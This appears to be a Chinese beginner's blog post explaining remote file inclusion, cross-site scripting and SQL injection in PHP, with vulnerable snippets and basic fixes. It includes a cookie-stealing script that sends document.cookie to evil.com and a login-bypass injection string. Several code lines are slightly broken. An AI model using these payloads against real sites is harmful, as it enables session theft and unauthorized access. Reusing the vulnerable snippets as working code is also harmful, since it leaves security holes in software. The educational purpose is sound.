常见的PHP安全漏洞-跨站、注入和文件包含

安全历来是网络编程重要的组成部分,PHP作为一门服务器端脚本语言,直接与服务器有密切的联系,如果书写安全的PHP代码,如何避免最基本的攻击手段,下面我简单的给出了PHP三种最常见的攻击手段以及防范办法。本文取自网络文章,出处不详。但是通俗易懂,很利于初学者对安全有所认知。
1.include的时候要小心,要判断你本地是否有这个文件,以免造成安全漏洞。
比如:
<?php
include $module.'.php';
?>
这里假设$module是全局变量。
这个脚本让攻击者有机会在你的服务器上执行任何的php代码,比如他在浏览器url后面加上?module=http://example.com/my就行了。当php接收到这个url的时候,脚本中的"$module"变量的值将被设置为http://example.com/my。因此当php执行include的时候就很危险了......
解决办法:关闭php.ini中的register_globals或include的时候判断一下。
<?php
if(file_exists($module.'.php')){
include $module.'.php';
}
?>
php.ini里面有个设置。设定open_basedir后只有指定的目录和子目录下的php脚本才会被执行。
用php读取open_basedir以外的目录或文件会报错
权限不足一般虚拟主机供应商都是设定为/tmp和/home
2.跨站运行脚本。
简单的说是攻击者可以在用户的浏览器端执行一些客户端的脚本,例如js,然后盗取用户的cookies或其他重要数据。
比如<script language='javaScript'>document.location=?'http://evil.com/cgi-bin/cookie.cgi?f='+document.cookie</script>
如果你点击了按钮,你本地的cookie信息将会被发送的某个人的邮箱(由此可见你想做个盗取用户信息的网站是多么容易)。
3.SQL注入
个人觉得是sql自身的灵活,易用给自己带来的负面影响。
<?php
$query "select login_id from users where user='$user' and pwd='$pw'";
mysql_query($query);
?>
比如有人这样访问http://example.com/login.php?user=admin'%20OR%20(user=''&pwd='')%20R%20user='你的php代码可能变成。
<?php
$query = "select login_id from user where user='admin' or (user = '' and pwd='') or user=''";
mysql_query($query);
?>
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值